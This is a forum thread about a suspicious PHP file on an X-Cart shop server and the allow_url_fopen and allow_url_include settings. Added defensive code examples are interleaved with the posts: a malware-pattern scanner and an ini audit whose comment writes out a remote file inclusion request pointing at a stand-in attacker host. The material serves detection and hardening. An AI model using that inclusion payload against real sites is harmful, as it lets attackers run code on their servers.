NJT123 Posted January 12, 2010
Hi, I'm hoping someone with knowledge of PHP can swiftly put my mind at rest. Until yesterday I had not even heard of PHP, so apologies if this is completely obvious. A couple of days ago my server started giving me warning summaries of recently uploaded CGI scripts that send mail from my server, alluding to the fact it may be spam. Only I have access to my server, and the FTP logs against the culprit file all give my local IP address. I have read through the file, and some basic PHP, and I think it is just some sort of error log compiler that then emails the error log to someone (who I do not know). I have attached the file in question below. I think it's harmless, but would very much like to hear the same conclusion from a PHP expert. Any input greatly appreciated! NJT
[attachment deleted by admin]
Thread: https://forums.phpfreaks.com/topic/188169-malicious-php-code/
Mchl Posted January 12, 2010
By itself it does nothing. It contains however some PHP settings that, if implemented on your server, may increase its vulnerability to attack from outside. Check if there are no more suspicious files or bits of code on your site. There are several kinds of malware that use passwords stored in FTP clients to upload malicious code to your server. That's why you should NOT store passwords in these clients.
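One way to do the check Mchl suggests (look for other suspicious files or code on the site). This is an added example, not code from the thread, from X-Cart or from any scanner: it walks a web root and reports PHP files that were changed recently or that contain constructs commonly seen in uploaded mailer and backdoor scripts. The pattern list and the `/var/www/html` path are assumptions; hits are leads to read by hand, not proof of compromise, since a shop like X-Cart legitimately calls `mail()`.

```php
<?php
// Added example (not from the thread or from X-Cart): scan a web root for
// recently modified PHP files and for constructs typical of dropped scripts.
declare(strict_types=1);

/** Constructs rare in clean application code but common in uploaded malware. */
const SUSPICIOUS_PATTERNS = [
    'eval('          => 'executes generated code',
    'base64_decode(' => 'often hides an obfuscated payload',
    'gzinflate('     => 'often paired with base64_decode() to unpack a payload',
    'str_rot13('     => 'cheap obfuscation',
    'assert('        => 'a string argument is executed as code on old PHP',
    'preg_replace('  => 'check for the /e modifier, which executes the replacement',
    'mail('          => 'legitimate in a shop, but the call every spam mailer makes',
    '$_REQUEST'      => 'untrusted input, suspicious when fed to the functions above',
];

/**
 * Walk $root and return files worth reading, keyed by path.
 * A file is reported when it is recent (mtime within $recentDays) and matches
 * at least one pattern, or when it matches three or more patterns regardless of age.
 *
 * @return array<string, array{mtime: string, recent: bool, hits: string[]}>
 */
function scan_webroot(string $root, int $recentDays = 7): array
{
    $cutoff   = time() - $recentDays * 86400;
    $findings = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        // Only PHP-ish files; .inc and .phtml are executed by many hosts too.
        if (!$file->isFile() || !preg_match('/\.(php\d?|phtml|inc)$/i', $file->getFilename())) {
            continue;
        }
        $src = @file_get_contents($file->getPathname());
        if ($src === false) {
            continue;
        }
        $hits = [];
        foreach (SUSPICIOUS_PATTERNS as $needle => $why) {
            if (stripos($src, $needle) !== false) {
                $hits[] = "$needle: $why";
            }
        }
        $recent = $file->getMTime() >= $cutoff;
        if (($recent && $hits) || count($hits) >= 3) {
            $findings[$file->getPathname()] = [
                'mtime'  => date('Y-m-d H:i:s', $file->getMTime()),
                'recent' => $recent,
                'hits'   => $hits,
            ];
        }
    }
    return $findings;
}

// Usage: php scan.php /var/www/html   (web root path is an assumption)
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (scan_webroot($argv[1]) as $path => $f) {
        printf("%s  (modified %s%s)\n", $path, $f['mtime'], $f['recent'] ? ', recent' : '');
        foreach ($f['hits'] as $hit) {
            echo "    - $hit\n";
        }
    }
}
```

Cross-check every reported file against the FTP log and the application's own release files before deleting anything; a file that was uploaded by an attacker who stole FTP credentials, as Mchl describes, will still appear in the FTP log as a normal upload, so the modification time and content are the better signal than the log alone.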
salathe Posted January 12, 2010
That attached file is essentially a different representation of the contents of a php.ini configuration file. The file does not 'compile' any error logs nor does it email anyone... did you perhaps attach the wrong file?
NJT123 Posted January 12, 2010 (Author)
Many thanks for the replies. I've checked the file, and it is correct. Just to be doubly sure I've attached the original from the server here (I saved the same file out as txt in the previous post).
[attachment deleted by admin]
NJT123 Posted January 12, 2010 (Author)
I'm now wondering if this might be overzealous spam checking on the part of my server, and it simply picked up the word 'mail' from inside the PHP file. Just a little strange I've never received it (the error) before.
Mchl Posted January 12, 2010
Do you use PHP anywhere else on your site?
NJT123 Posted January 12, 2010 (Author)
To be honest, I do not know. It's an e-commerce site powered by X-Cart, so I would imagine the answer to be yes.
Mchl Posted January 12, 2010
So this might as well be a hole in X-Cart being exploited. Especially if in your php.ini you have the 'allow_url_fopen' and 'allow_url_include' settings enabled (as the file you attached suggests).
NJT123 Posted January 12, 2010 (Author)
Thanks again. I've posted this question to X-Cart directly, including a link to this thread and the file. Will update everyone on the answer. In the meantime, any other conclusions welcome.
Mchl Posted January 12, 2010
If you have access to your php.ini file, check what values the settings given above have. You can also use the phpinfo function for that. If you can, disable the 'allow_url_include' setting.
NJT123 Posted January 12, 2010 (Author)
Thanks for the advice, I have access to the file. However, I have no clue about how all this ties into the rest of the store, and I'm loath to make changes to something I do not understand.
Mchl Posted January 12, 2010
The manual here: http://www.x-cart.com/xcart_manual/compiled/X-Cart_430_manual.pdf says you need

allow_url_fopen = On

but you can probably safely disable allow_url_include:

allow_url_include = Off
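The settings discussed in the last few posts, worked through in code. This is an added example, not code from the thread, from X-Cart or from the PHP manual: it audits the two php.ini values the way phpinfo() would show them, and puts the include pattern that allow_url_include turns into remote code execution beside a hardened version. The `pages/` directory, the allow-listed page names and the hypothetical `?page=` parameter are assumptions; the facts about the ini settings are from PHP itself (both are PHP_INI_SYSTEM, so they must be set in php.ini or in httpd.conf via php_admin_flag, never with ini_set()).

```php
<?php
// Added example (not from the thread, X-Cart or the PHP docs): audit
// allow_url_fopen / allow_url_include and show why the second one matters.
// Assumes PHP >= 5.2, where allow_url_include was introduced.
declare(strict_types=1);

/**
 * Desired state, per the X-Cart manual linked above and ordinary hardening:
 *   allow_url_fopen   = On   ; X-Cart uses HTTP wrappers in fopen()/file_get_contents()
 *   allow_url_include = Off  ; only needed to include/require code over HTTP, i.e. never
 * Returns, per setting, the effective value and whether it matches the desired one.
 *
 * @return array<string, array{value: string, ok: bool}>
 */
function audit_url_settings(): array
{
    $expected = ['allow_url_fopen' => true, 'allow_url_include' => false];
    $report   = [];
    foreach ($expected as $name => $want) {
        // ini_get() returns "1", "0" or "" for booleans; normalise as phpinfo() does.
        $actual = filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
        $report[$name] = [
            'value' => $actual ? 'On' : 'Off',
            'ok'    => $actual === $want,
        ];
    }
    return $report;
}

// Vulnerable pattern (hypothetical, the kind of hole a PHP application can have):
//
//     include $_GET['page'] . '.php';
//
// With allow_url_include = On, a request such as ?page=http://evil.example/x.txt%3F
// makes PHP fetch and execute the attacker's file (the trailing '?' turns the
// appended '.php' into a query string). With it Off, the same line still permits
// local file inclusion, so the include path has to be validated as well; changing
// the ini setting only removes the remote variant.

/**
 * Hardened replacement: the page name must be on an allow-list, and the resolved
 * path must stay inside $pagesDir. Returns the absolute path for include.
 */
function resolve_page(string $page, string $pagesDir): string
{
    static $allowed = ['home', 'cart', 'checkout'];   // assumed page names
    if (!in_array($page, $allowed, true)) {
        throw new InvalidArgumentException("unknown page: $page");
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("page resolves outside $pagesDir: $page");
    }
    return $path;
}

// Usage (CLI or a throw-away script in the web root that you delete afterwards):
if (PHP_SAPI === 'cli') {
    foreach (audit_url_settings() as $name => $r) {
        printf("%-18s = %-3s %s\n", $name, $r['value'], $r['ok'] ? 'ok' : 'CHANGE THIS');
    }
}
```

Running the audit from the command line checks the CLI's php.ini, which on many hosts is a different file from the one Apache or PHP-FPM loads; to see the values the web server actually uses, run it through the web server once (or compare against phpinfo() served by the site) and then remove the script.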
NJT123 Posted January 12, 2010 (Author)
Above and beyond, Mchl. Thank you! Will have a dabble with more confidence now. If you do any work on a consultancy basis / hourly rate and are happy working with X-Cart and e-commerce payment systems, PM me, I have plenty available. People with the right skills have proven few and far between.
Mchl Posted January 12, 2010
Unfortunately, apart from having very little time on my hands, I've also no experience with X-Cart, and it would be worse than irresponsible of me to embark on finding and fixing possible security flaws in it. Disabling allow_url_include might fix your issue, but just as well it might not. It's just one possible vector of attack less.